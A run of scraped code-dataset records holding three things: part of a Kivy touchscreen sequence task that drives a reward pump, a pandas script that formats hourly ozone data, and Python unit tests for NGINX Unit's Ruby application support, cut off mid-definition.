self.button1_in.move(np.array([self.possible_target_pos_x[0], self.possible_target_pos_y[0]]))\r\n self.button1_in.color = (0., 0., 0., 1.)\r\n self.button2_out.move(np.array([self.possible_target_pos_x[1], self.possible_target_pos_y[1]]))\r\n self.button2_out.color = (1., 1., 0., 1.)\r\n self.button2_in.move(np.array([self.possible_target_pos_x[1], self.possible_target_pos_y[1]]))\r\n self.button2_in.color = (0., 0., 0., 1.)\r\n self.button3_out.move(np.array([self.possible_target_pos_x[2], self.possible_target_pos_y[2]]))\r\n self.button3_out.color = (1., 1., 0., 1.)\r\n self.button3_in.move(np.array([self.possible_target_pos_x[2], self.possible_target_pos_y[2]]))\r\n self.button3_in.color = (0., 0., 0., 1.)\r\n self.button4_out.move(np.array([self.possible_target_pos_x[3], self.possible_target_pos_y[3]]))\r\n self.button4_out.color = (1., 1., 0., 1.)\r\n self.button4_in.move(np.array([self.possible_target_pos_x[3], self.possible_target_pos_y[3]]))\r\n self.button4_in.color = (0., 0., 0., 1.)\r\n self.button5_out.move(np.array([self.possible_target_pos_x[4], self.possible_target_pos_y[4]]))\r\n self.button5_out.color = (1., 1., 0., 1.)\r\n self.button5_in.move(np.array([self.possible_target_pos_x[4], self.possible_target_pos_y[4]]))\r\n self.button5_in.color = (0., 0., 0., 1.)\r\n self.button6_out.move(np.array([self.possible_target_pos_x[5], self.possible_target_pos_y[5]]))\r\n self.button6_out.color = (1., 1., 0., 1.)\r\n self.button6_in.move(np.array([self.possible_target_pos_x[5], self.possible_target_pos_y[5]]))\r\n self.button6_in.color = (0., 0., 0., 1.)\r\n self.button7_out.move(np.array([self.possible_target_pos_x[6], self.possible_target_pos_y[6]]))\r\n self.button7_out.color = (1., 1., 0., 1.)\r\n self.button7_in.move(np.array([self.possible_target_pos_x[6], self.possible_target_pos_y[6]]))\r\n self.button7_in.color = (0., 0., 0., 1.)\r\n self.button8_out.move(np.array([self.possible_target_pos_x[7], self.possible_target_pos_y[7]]))\r\n self.button8_out.color = (1., 1., 0., 1.)\r\n self.button8_in.move(np.array([self.possible_target_pos_x[7], self.possible_target_pos_y[7]]))\r\n self.button8_in.color = (0., 0., 0., 1.)\r\n self.button9_out.move(np.array([self.possible_target_pos_x[8], self.possible_target_pos_y[8]]))\r\n self.button9_out.color = (1., 1., 0., 1.)\r\n self.button9_in.move(np.array([self.possible_target_pos_x[8], self.possible_target_pos_y[8]]))\r\n self.button9_in.color = (0., 0., 0., 1.)\r\n self.button10_out.move(np.array([self.possible_target_pos_x[9], self.possible_target_pos_y[9]]))\r\n self.button10_out.color = (1., 1., 0., 1.)\r\n self.button10_in.move(np.array([self.possible_target_pos_x[9], self.possible_target_pos_y[9]]))\r\n self.button10_in.color = (0., 0., 0., 1.)\r\n self.button11_out.move(np.array([self.possible_target_pos_x[10], self.possible_target_pos_y[10]]))\r\n self.button11_out.color = (1., 1., 0., 1.)\r\n self.button11_in.move(np.array([self.possible_target_pos_x[10], self.possible_target_pos_y[10]]))\r\n self.button11_in.color = (0., 0., 0., 1.)\r\n self.button12_out.move(np.array([self.possible_target_pos_x[11], self.possible_target_pos_y[11]]))\r\n self.button12_out.color = (1., 1., 0., 1.)\r\n self.button12_in.move(np.array([self.possible_target_pos_x[11], self.possible_target_pos_y[11]]))\r\n self.button12_in.color = (0., 0., 0., 1.)\r\n self.button13_out.move(np.array([self.possible_target_pos_x[12], self.possible_target_pos_y[12]]))\r\n self.button13_out.color = (1., 1., 0., 1.)\r\n self.button13_in.move(np.array([self.possible_target_pos_x[12], self.possible_target_pos_y[12]]))\r\n self.button13_in.color = (0., 0., 0., 1.)\r\n self.button14_out.move(np.array([self.possible_target_pos_x[13], self.possible_target_pos_y[13]]))\r\n self.button14_out.color = (1., 1., 0., 1.)\r\n self.button14_in.move(np.array([self.possible_target_pos_x[13], self.possible_target_pos_y[13]]))\r\n self.button14_in.color = (0., 0., 0., 1.)\r\n self.button15_out.move(np.array([self.possible_target_pos_x[14], self.possible_target_pos_y[14]]))\r\n self.button15_out.color = (1., 1., 0., 1.)\r\n self.button15_in.move(np.array([self.possible_target_pos_x[14], self.possible_target_pos_y[14]]))\r\n self.button15_in.color = (0., 0., 0., 1.)\r\n self.button16_out.move(np.array([self.possible_target_pos_x[15], self.possible_target_pos_y[15]]))\r\n self.button16_out.color = (1., 1., 0., 1.)\r\n self.button16_in.move(np.array([self.possible_target_pos_x[15], self.possible_target_pos_y[15]]))\r\n self.button16_in.color = (0., 0., 0., 1.)\r\n \r\n # Update the progress bar\r\n self.percent_done = 100*(self.set_ix/self.nsets_per_hyperset)\r\n \r\n # Determine which targets to show for this set\r\n self.target_index = np.array([2*(self.sets_selected[self.set_ix-1]), 2*(self.sets_selected[self.set_ix-1])+1])\r\n \r\n self.targtouch_rew_given = False\r\n \r\n # Change the position of the targets\r\n if self.repeat is False:\r\n self.target1_position = np.array([self.possible_target_pos_x[self.target_list[self.target_HS_index, self.target_index[0]]], self.possible_target_pos_y[self.target_list[self.target_HS_index, self.target_index[0]]]])\r\n self.target2_position = np.array([self.possible_target_pos_x[self.target_list[self.target_HS_index, self.target_index[1]]], self.possible_target_pos_y[self.target_list[self.target_HS_index, self.target_index[1]]]])\r\n \r\n # self.target_set_index += 2\r\n print(self.target1_position)\r\n print(self.target2_position)\r\n \r\n self.target1.move(self.target1_position)\r\n self.target2.move(self.target2_position)\r\n self.target1.color = (1., 1., 0., 1.)\r\n self.target2.color = (1., 1., 0., 1.)\r\n self.repeat = False\r\n \r\n # Turn exit buttons gray\r\n self.exit_target1.color = (.15, .15, .15, 1)\r\n self.exit_target2.color = (.15, .15, .15, 1)\r\n # self.indicator_targ.color = (.25, .25, .25, 1.)\r\n \r\n if self.first_set_attempt:\r\n self.first_set_attempt_t0 = time.time();\r\n self.first_set_attempt = False\r\n \r\n # Touch Targets\r\n def touch_target1(self, **kwargs):\r\n if self.drag_ok:\r\n return self.check_if_cursors_in_targ(self.target1_position, self.target_rad)\r\n else:\r\n return np.logical_and(self.check_if_cursors_in_targ(self.target1_position, self.target_rad),\r\n self.check_if_started_in_targ(self.target1_position, self.target_rad))\r\n \r\n def touch_target2(self, **kwargs):\r\n if self.drag_ok:\r\n return self.check_if_cursors_in_targ(self.target2_position, self.target_rad)\r\n else:\r\n return np.logical_and(self.check_if_cursors_in_targ(self.target2_position, self.target_rad),\r\n self.check_if_started_in_targ(self.target2_position, self.target_rad))\r\n \r\n def touch_nontarg(self, **kwargs):\r\n nontarg_error = False\r\n if np.logical_and(self.nontarget_error_tolerance < 100, self.touch):\r\n nontarg_error = not np.logical_or(self.check_if_cursors_in_targ(self.target1_position, self.nontarget_error_tolerance*self.target_rad), \r\n self.check_if_cursors_in_targ(self.target2_position, self.nontarget_error_tolerance*self.target_rad))\r\n\r\n return nontarg_error\r\n \r\n # Starting with target 2 gives an error\r\n def t2p_first_error(self, **kwargs):\r\n return self.t2p_first_is_error\r\n \r\n # Start Target Holds --> Change the Color of the target to yellow?\r\n def _start_targ1_hold(self, **kwargs):\r\n self.target1.color = (0., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n def _start_targ2_hold(self, **kwargs):\r\n self.target2.color = (0., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n def _start_t2p_targ1_hold(self, **kwargs):\r\n self.target1.color = (0., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n def _start_t1p_targ2_hold(self, **kwargs):\r\n self.target2.color = (0., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n # End Target Holds --> Change the color of the target to same as background\r\n def _end_targ1_hold(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n \r\n def _end_targ2_hold(self, **kwargs):\r\n self.target2.color = (0., 0., 0., 1.)\r\n \r\n # Finish target hold?\r\n def finish_targ_hold(self, **kwargs):\r\n return self.tht <= kwargs['ts']\r\n \r\n # One target has been pressed --> make it invisible\r\n def _start_targ1_pressed(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (1., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n if self.rew_tone_every:\r\n print('rew every correct')\r\n sound = SoundLoader.load('reward2.wav')\r\n sound.play()\r\n \r\n if self.reward_for_targtouch[0] and not self.targtouch_rew_given:\r\n self.run_anytarg_rew()\r\n self.targtouch_rew_given = True\r\n \r\n def _start_targ2_pressed(self, **kwargs):\r\n self.target1.color = (1., 1., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n if self.reward_for_targtouch[0] and not self.targtouch_rew_given:\r\n self.run_anytarg_rew()\r\n self.targtouch_rew_given = True\r\n\r\n \r\n # Once a set is complete, determine whether to restart or move to the next set\r\n def hyperset_complete(self, **kwargs):\r\n return self.set_ix == self.nsets_per_hyperset\r\n \r\n def next_set(self, **kwargs):\r\n return self.set_ix < self.nsets_per_hyperset\r\n \r\n \r\n ################################### REWARD STATES ################################\r\n def _start_reward_set(self, **kwargs):\r\n self.trial_counter += 1\r\n Window.clearcolor = (1., 1., 1., 1.)\r\n self.target1.color = (1., 1., 1., 1.)\r\n self.target2.color = (1., 1., 1., 1.)\r\n \r\n # # Turn exit targets white\r\n # self.exit_target1.color = (1., 1., 1., 1.)\r\n # self.exit_target2.color = (1., 1., 1., 1.)\r\n self.rew_cnt = 0\r\n self.cnts_in_rew = 0\r\n # self.indicator_targ.color = (1., 1., 1., 1.)\r\n self.repeat = False\r\n \r\n def _while_reward_set(self, **kwargs):\r\n if self.rew_cnt == 0:\r\n self.run_set_rew()\r\n self.rew_cnt += 1\r\n \r\n def end_reward_set(self, **kwargs):\r\n # Advance to the next set\r\n self.set_ix += 1\r\n \r\n # The next set will be the first attempt of that set\r\n self.first_set_attempt = True\r\n \r\n return True\r\n \r\n def _start_reward_hyperset(self, **kwargs):\r\n self.trial_counter += 1\r\n \r\n # Turn the screen green\r\n Window.clearcolor = (0., 1., 0., 1.)\r\n self.change_allbutton_color(0, 1, 0, 1)\r\n \r\n self.rew_cnt = 0\r\n self.cnts_in_rew = 0\r\n # self.indicator_targ.color = (1., 1., 1., 1.)\r\n self.repeat = False\r\n \r\n def _while_reward_hyperset(self, **kwargs):\r\n if self.rew_cnt == 0:\r\n self.run_HS_rew()\r\n self.rew_cnt += 1\r\n \r\n def end_reward_hyperset(self, **kwargs):\r\n return True\r\n \r\n ################################### ERROR STATES ################################\r\n # Set Error\r\n def _start_set_error(self, **kwargs):\r\n # Play an error tone\r\n if self.anytarg_rew == 0:\r\n sound = SoundLoader.load('error1.wav')\r\n sound.play()\r\n \r\n # Make the screen red\r\n self.percent_done = 0\r\n Window.clearcolor = (1., 0., 0., 1.)\r\n self.change_allbutton_color(1, 0, 0, 1)\r\n \r\n \r\n def end_set_error(self, **kwargs):\r\n # end the set error after the timeout period\r\n return kwargs['ts'] > self.error_timeout_time\r\n \r\n # Early leave from target --> hold error (buttons turn invisible)\r\n def early_leave_target1_hold(self, **kwargs):\r\n return not self.check_if_cursors_in_targ(self.target1_position, self.target_rad)\r\n \r\n def early_leave_target2_hold(self, **kwargs):\r\n return not self.check_if_cursors_in_targ(self.target2_position, self.target_rad)\r\n \r\n def _start_hold_error_nopress(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_hold_error_nopress(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n def _start_hold_error_t1p(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_hold_error_t1p(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n def _start_hold_error_t2p(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_hold_error_t2p(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n \r\n # Drag outside of target --> drag error (buttons turn invisible)\r\n def targ1_drag_out(self, **kwargs):\r\n touch = self.touch\r\n self.touch = True\r\n stay_in = self.check_if_cursors_in_targ(self.target1_position, self.target_rad)\r\n self.touch = touch\r\n return not stay_in\r\n \r\n def targ2_drag_out(self, **kwargs):\r\n touch = self.touch\r\n self.touch = True\r\n stay_in = self.check_if_cursors_in_targ(self.target2_position, self.target_rad)\r\n self.touch = touch\r\n return not stay_in\r\n \r\n def _start_drag_error_nopress(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_drag_error_nopress(self, **kwargs):\r\n return kwargs['ts'] >= self.drag_error_timeout\r\n \r\n def _start_drag_error_t1p(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_drag_error_t1p(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n def _start_drag_error_t2p(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_drag_error_t2p(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n \r\n # Timeout error\r\n def set_timeout(self, **kwargs):\r\n #return kwargs['ts'] > self.target_timeout_time\r\n if time.time() - self.first_set_attempt_t0 > self.set_timeout_time:\r\n self.repeat = False\r\n return True\r\n \r\n def _start_timeout_error(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n #self.repeat = True\r\n \r\n def end_timeout_error(self, **kwargs):\r\n return kwargs['ts'] >= self.timeout_error_timeout\r\n \r\n # Check if the cursor is in the target and started in the target\r\n def check_if_started_in_targ(self, targ_center, targ_rad):\r\n startedInTarg = False\r\n if self.touch:\r\n for id_ in self.cursor_ids:\r\n # If in target: \r\n if np.linalg.norm(np.array(self.cursor[id_]) - targ_center) < targ_rad:\r\n if np.linalg.norm(np.array(self.cursor_start[id_]) - targ_center) < targ_rad:\r\n startedInTarg = True\r\n return startedInTarg\r\n\r\n def check_if_cursors_in_targ(self, targ_center, targ_rad):\r\n if self.touch:\r\n inTarg = False\r\n for id_ in self.cursor_ids:\r\n if np.linalg.norm(np.array(self.cursor[id_]) - targ_center) < targ_rad:\r\n inTarg = True\r\n\r\n return inTarg\r\n else:\r\n return False\r\n \r\n \r\n # Generate reward schedule\r\n def gen_rewards(self, perc_trials_rew, perc_trials_2x, reward_for_grasp):\r\n mini_block = int(2*(np.round(1./self.percent_of_trials_rewarded)))\r\n rew = []\r\n trial_cnt_bonus = 0\r\n\r\n for i in range(500):\r\n mini_block_array = np.zeros((mini_block))\r\n ix = np.random.permutation(mini_block)\r\n mini_block_array[ix[:2]] = reward_for_grasp[1]\r\n\r\n trial_cnt_bonus += mini_block\r\n if perc_trials_2x > 0:\r\n if trial_cnt_bonus > int(1./(perc_trials_rew*perc_trials_2x)):\r\n mini_block_array[ix[0]] = reward_for_grasp[1]*2.\r\n trial_cnt_bonus = 0\r\n\r\n rew.append(mini_block_array)\r\n return np.hstack((rew))\r\n \r\n # Run Rewards\r\n def run_anytarg_rew(self, **kwargs):\r\n print('Run anytarg reward')\r\n try:\r\n ### To trigger reward make sure reward is > 0:\r\n if self.anytarg_rew > 0:\r\n self.reward_port.open()\r\n rew_str = [ord(r) for r in 'inf 50 ml/min '+str(self.anytarg_rew)+' sec\\n']\r\n self.reward_port.write(rew_str)\r\n time.sleep(.25)\r\n run_str = [ord(r) for r in 'run\\n']\r\n self.reward_port.write(run_str)\r\n self.reward_port.close()\r\n except:\r\n pass\r\n\r\n #self.repeat = True\r\n \r\n def run_set_rew(self, **kwargs):\r\n try:\r\n #winsound.PlaySound('beep1.wav', winsound.SND_ASYNC)\r\n sound = SoundLoader.load('reward2.wav')\r\n sound.play()\r\n\r\n ### To trigger reward make sure reward is > 0:\r\n if self.set_rew > 0:\r\n self.reward_port.open()\r\n rew_str = [ord(r) for r in 'inf 50 ml/min '+str(self.set_rew)+' sec\\n']\r\n self.reward_port.write(rew_str)\r\n time.sleep(.25)\r\n run_str = [ord(r) for r in 'run\\n']\r\n self.reward_port.write(run_str)\r\n self.reward_port.close()\r\n except:\r\n pass\r\n\r\n #self.repeat = True\r\n \r\n def run_HS_rew(self, **kwargs):\r\n try:\r\n #winsound.PlaySound('beep1.wav', winsound.SND_ASYNC)\r\n sound = SoundLoader.load('reward1.wav')\r\n sound.play()\r\n \r\n print('in big reward:')\r\n self.repeat = False\r\n #winsound.PlaySound('beep1.wav', winsound.SND_ASYNC)\r\n #sound = SoundLoader.load('reward1.wav')\r\n #print(str(self.reward_generator[self.trial_counter]))\r\n #print(self.trial_counter)\r\n #print(self.reward_generator[:100])\r\n # self.reward1.play()\r\n\r\n # if not self.skip_juice:\r\n # if self.reward_generator[self.trial_counter] > 0:\r\n self.reward_port.open()\r\n #rew_str = [ord(r) for r in 'inf 50 ml/min '+str(self.reward_for_targtouch[1])+' sec\\n']\r\n rew_str = [ord(r) for r in 'inf 50 ml/min '+str(self.hs_rew)+' sec\\n']\r\n self.reward_port.write(rew_str)\r\n time.sleep(.25 + self.reward_delay_time)\r\n run_str = [ord(r) for r in 'run\\n']\r\n self.reward_port.write(run_str)\r\n self.reward_port.close()\r\n except:\r\n pass\r\n \r\n # Other utilities\r\n def change_allbutton_color(self, r, g, b, a):\r\n self.exit_target1.color = (r, g, b, a)\r\n self.exit_target2.color = (r, g, b, a)\r\n self.target1.color = (r, g, b, a)\r\n self.target2.color = (r, g, b, a)\r\n self.button1_out.color = (r, g, b, a)\r\n self.button1_in.color = (r, g, b, a)\r\n self.button2_out.color = (r, g, b, a)\r\n self.button2_in.color = (r, g, b, a)\r\n self.button3_out.color = (r, g, b, a)\r\n self.button3_in.color = (r, g, b, a)\r\n self.button4_out.color = (r, g, b, a)\r\n self.button4_in.color = (r, g, b, a)\r\n self.button5_out.color = (r, g, b, a)\r\n self.button5_in.color = (r, g, b, a)\r\n self.button6_out.color = (r, g, b, a)\r\n self.button6_in.color = (r, g, b, a)\r\n self.button7_out.color = (r, g, b, a)\r\n self.button7_in.color = (r, g, b, a)\r\n self.button8_out.color = (r, g, b, a)\r\n self.button8_in.color = (r, g, b, a)\r\n self.button9_out.color = (r, g, b, a)\r\n self.button9_in.color = (r, g, b, a)\r\n self.button10_out.color = (r, g, b, a)\r\n self.button10_in.color = (r, g, b, a)\r\n self.button11_out.color = (r, g, b, a)\r\n self.button11_in.color = (r, g, b, a)\r\n self.button12_out.color = (r, g, b, a)\r\n self.button12_in.color = (r, g, b, a)\r\n self.button13_out.color = (r, g, b, a)\r\n self.button13_in.color = (r, g, b, a)\r\n self.button14_out.color = (r, g, b, a)\r\n self.button14_in.color = (r, g, b, a)\r\n self.button15_out.color = (r, g, b, a)\r\n self.button15_in.color = (r, g, b, a)\r\n self.button16_out.color = (r, g, b, a)\r\n self.button16_in.color = (r, g, b, a)\r\n \r\n \r\n \r\nclass Splash(Widget):\r\n def init(self, *args):\r\n self.args = args\r\n # from sound import Sound\r\n # Sound.volume_max() \r\n \r\nclass Target(Widget):\r\n color = ListProperty([0., 0., 0., 1.])\r\n\r\n def set_size(self, size):\r\n size_pix = [cm2pix(size), cm2pix(size)]\r\n self.size=size_pix\r\n\r\n def move(self, pos):\r\n # Convert cm to pixels\r\n pos_pix = cm2pix(pos).astype(int)\r\n pos_pix_int = tuple((int(pos_pix[0]), int(pos_pix[1])))\r\n self.center = pos_pix_int\r\n \r\n \r\nclass Manager(ScreenManager):\r\n pass \r\n \r\n \r\nclass SequenceApp(App):\r\n def build(self, **kwargs):\r\n if platform == 'darwin':\r\n screenx = 1800\r\n screeny = 1000\r\n elif platform =='win32':\r\n from win32api import GetSystemMetrics\r\n screenx = GetSystemMetrics(0)\r\n screeny = GetSystemMetrics(1)\r\n \r\n Window.size = (1800, 1000)\r\n Window.left = (screenx - 1800)/2\r\n Window.top = (screeny - 1000)/2\r\n return Manager() \r\n \r\ndef cm2pix(pos_cm, fixed_window_size=fixed_window_size, pix_per_cm=pix_per_cm):\r\n # Convert from CM to pixels: \r\n pix_pos = pix_per_cm*pos_cm\r\n\r\n if type(pix_pos) is np.ndarray:\r\n # Translate to coordinate system w/ 0, 0 at bottom left\r\n pix_pos[0] = pix_pos[0] #+ (fixed_window_size[0]/2.)\r\n pix_pos[1] = pix_pos[1] #+ (fixed_window_size[1]/2.)\r\n\r\n return pix_pos \r\n \r\ndef pix2cm(pos_pix, fixed_window_size=fixed_window_size, pix_per_cm=pix_per_cm):\r\n # First shift coordinate system: \r\n pos_pix[0] = pos_pix[0] #- (fixed_window_size[0]/2.)\r\n pos_pix[1] = pos_pix[1] #- (fixed_window_size[1]/2.)\r\n\r\n pos_cm = pos_pix*(1./pix_per_cm)\r\n return pos_cm \r\n \r\ndef reset():\r\n import kivy.core.window as window\r\n from kivy.base import EventLoop\r\n if not EventLoop.event_listeners:\r\n from kivy.cache import Cache\r\n window.Window = window.core_select_lib('window', window.window_impl, True)\r\n Cache.print_usage()\r\n for cat in Cache._categories:\r\n Cache._objects[cat] = {}\r\n\r\nif __name__ == '__main__':\r\n # reset()\r\n SequenceApp().run()\r\n","sub_path":"touchscreen_co/Touchscreen/SeqHikosaka/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":60560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"265440698","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import Series, DataFrame\nfrom datetime import datetime\nimport time\nimport math\n\n\n#

2014-2018

\n\n# In[ ]:\n\n\nyear_list = np.arange(2014, 2018).tolist()\nfor year in year_list:\n #Importing Data\n filename = \"/project/lindner/moving/summer2018/Pollutant_Data/{}_data_ibh.csv\".format(year)\n original_data = pd.read_csv(filename, low_memory=False, nrows=10)\n #Below use when ready \n #original_data = pd.read_csv(filename, low_memory=False)\n try:\n original_data = original_data.drop('Unnamed: 0', axis = 1)\n except:\n pass\n data=pd.DataFrame()\n data['time'] = pd.to_datetime(original_data['epoch'], unit='s').dt.time\n data['date'] = pd.to_datetime(original_data['epoch'], unit='s').dt.date\n data['day'] = pd.to_datetime(original_data['epoch'], unit='s').dt.day\n data['month'] = pd.to_datetime(original_data['epoch'], unit='s').dt.month\n data['year'] = pd.to_datetime(original_data['epoch'], unit='s').dt.year\n data['hour'] = pd.to_datetime(original_data['epoch'], unit='s').dt.hour\n\n #List of epoch times\n epoch_start = original_data['epoch'].unique().min()\n epoch_end = original_data['epoch'].unique().max()\n epoch_list = list(np.arange(epoch_start, epoch_end+300, 300))\n\n #import available sites data\n site_data = pd.read_csv(\"Valid_sites.csv\")\n site_list = list(site_data['O3'].dropna())\n\n try:\n site_data = site_data.drop('Unnamed: 0', axis = 1)\n except:\n pass\n\n #conversion of data\n sample_data = original_data\n data['epoch'] = epoch_list\n data.set_index('epoch', inplace=True)\n data['site'] = original_data['siteID']\n data['o3']=original_data['o3']\n data['temp']=original_data['temp']\n data['wind_x_dir'] = original_data['windspd'] * np.cos(original_data['winddir']*(np.pi/180))\n data['wind_y_dir'] = original_data['windspd'] * np.sin(original_data['winddir']*(np.pi/180))\n data_hour = data.groupby(['year','month','day', 'hour'], as_index=False).mean()\n data_hour = data.groupby(['year','month','day', 'hour'], as_index=False).mean()\n data_hour.to_csv('{}_ozone_hourly_ds3.csv'.format(year))\n\n","sub_path":"python-scripts/Ozone Formatting (Valid Data Conversion).py","file_name":"Ozone Formatting (Valid Data Conversion).py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"598608094","text":"import unittest\nimport unit\n\nclass TestUnitRubyApplication(unit.TestUnitApplicationRuby):\n\n def setUpClass():\n unit.TestUnit().check_modules('ruby')\n\n def test_ruby_application(self):\n self.load('variables')\n\n body = 'Test body string.'\n\n resp = self.post(headers={\n 'Host': 'localhost',\n 'Content-Type': 'text/html',\n 'Custom-Header': 'blah'\n }, body=body)\n\n self.assertEqual(resp['status'], 200, 'status')\n headers = resp['headers']\n header_server = headers.pop('Server')\n self.assertRegex(header_server, r'Unit/[\\d\\.]+', 'server header')\n self.assertEqual(headers.pop('Server-Software'), header_server,\n 'server software header')\n\n date = headers.pop('Date')\n self.assertEqual(date[-4:], ' GMT', 'date header timezone')\n self.assertLess(abs(self.date_to_sec_epoch(date) - self.sec_epoch()), 5,\n 'date header')\n\n self.assertDictEqual(headers, {\n 'Content-Length': str(len(body)),\n 'Content-Type': 'text/html',\n 'Request-Method': 'POST',\n 'Request-Uri': '/',\n 'Http-Host': 'localhost',\n 'Server-Protocol': 'HTTP/1.1',\n 'Custom-Header': 'blah',\n 'Rack-Version': '13',\n 'Rack-Url-Scheme': 'http',\n 'Rack-Multithread': 'false',\n 'Rack-Multiprocess': 'true',\n 'Rack-Run-Once': 'false',\n 'Rack-Hijack-Q': 'false',\n 'Rack-Hijack': '',\n 'Rack-Hijack-IO': ''\n }, 'headers')\n self.assertEqual(resp['body'], body, 'body')\n\n def test_ruby_application_query_string(self):\n self.load('query_string')\n\n resp = self.get(url='/?var1=val1&var2=val2')\n\n self.assertEqual(resp['headers']['Query-String'], 'var1=val1&var2=val2',\n 'Query-String header')\n\n @unittest.expectedFailure\n def test_ruby_application_server_port(self):\n self.load('server_port')\n\n self.assertEqual(self.get()['headers']['Server-Port'], '7080',\n 'Server-Port header')\n\n def test_ruby_application_status_int(self):\n self.load('status_int')\n\n self.assertEqual(self.get()['status'], 200, 'status int')\n\n def test_ruby_application_input_read_empty(self):\n self.load('input_read_empty')\n\n self.assertEqual(self.get()['body'], '', 'read empty')\n\n def test_ruby_application_input_read_parts(self):\n self.load('input_read_parts')\n\n self.assertEqual(self.post(body='0123456789')['body'], '012345678',\n 'input read parts')\n\n def test_ruby_application_input_read_buffer(self):\n self.load('input_read_buffer')\n\n self.assertEqual(self.post(body='0123456789')['body'], '0123456789',\n 'input read buffer')\n\n def test_ruby_application_input_read_buffer_not_empty(self):\n self.load('input_read_buffer_not_empty')\n\n self.assertEqual(self.post(body='0123456789')['body'], '0123456789',\n 'input read buffer not empty')\n\n def test_ruby_application_input_gets(self):\n self.load('input_gets')\n\n body = '0123456789'\n\n self.assertEqual(self.post(body=body)['body'], body, 'input gets')\n\n def test_ruby_application_input_gets_2(self):\n self.load('input_gets')\n\n self.assertEqual(self.post(body='01234\\n56789\\n')['body'], '01234\\n',\n 'input gets 2')\n\n def test_ruby_application_input_gets_all(self):\n self.load('input_gets_all')\n\n body = '\\n01234\\n56789\\n\\n'\n\n self.assertEqual(self.post(body=body)['body'], body, 'input gets all')\n\n def test_ruby_application_input_each(self):\n self.load('input_each')\n\n body = '\\n01234\\n56789\\n\\n'\n\n self.assertEqual(self.post(body=body)['body'], body, 'input each')\n\n @unittest.expectedFailure\n def test_ruby_application_input_rewind(self):\n self.load('input_rewind')\n\n body = '0123456789'\n\n self.assertEqual(self.post(body=body)['body'], body, 'input rewind')\n\n @unittest.expectedFailure\n def test_ruby_application_syntax_error(self):\n self.skip_alerts.extend([\n r'Failed to parse rack script',\n r'syntax error',\n r'new_from_string',\n r'parse_file'\n ])\n self.load('syntax_error')\n\n self.assertEqual(self.get()['status'], 500, 'syntax error')\n\n def test_ruby_application_errors_puts(self):\n self.load('errors_puts')\n\n self.get()\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+Error in application'),\n 'errors puts')\n\n def test_ruby_application_errors_puts_int(self):\n self.load('errors_puts_int')\n\n self.get()\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+1234567890'),\n 'errors puts int')\n\n def test_ruby_application_errors_write(self):\n self.load('errors_write')\n\n self.get()\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+Error in application'),\n 'errors write')\n\n def test_ruby_application_errors_write_to_s_custom(self):\n self.load('errors_write_to_s_custom')\n\n self.assertEqual(self.get()['status'], 200,\n 'errors write to_s custom')\n\n def test_ruby_application_errors_write_int(self):\n self.load('errors_write_int')\n\n self.get()\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+1234567890'),\n 'errors write int')\n\n def test_ruby_application_at_exit(self):\n self.skip_alerts.append(r'sendmsg.+failed')\n self.load('at_exit')\n\n self.get()\n\n self.conf({\n \"listeners\": {},\n \"applications\": {}\n })\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+At exit called\\.'), 'at exit')\n\n def test_ruby_application_header_custom(self):\n self.load('header_custom')\n\n resp = self.post(body=\"\\ntc=one,two\\ntc=three,four,\\n\\n\")\n\n self.assertEqual(resp['headers']['Custom-Header'],\n ['', 'tc=one,two', 'tc=three,four,', '', ''], 'header custom')\n\n @unittest.expectedFailure\n def test_ruby_application_header_custom_non_printable(self):\n self.load('header_custom')\n\n self.assertEqual(self.post(body='\\b')['status'], 500,\n 'header custom non printable')\n\n def test_ruby_application_header_status(self):\n self.load('header_status')\n\n self.assertEqual(self.get()['status'], 200, 'header status')\n\n @unittest.expectedFailure\n def test_ruby_application_header_rack(self):\n self.load('header_rack')\n\n self.assertEqual(self.get()['status'], 500, 'header rack')\n\n def 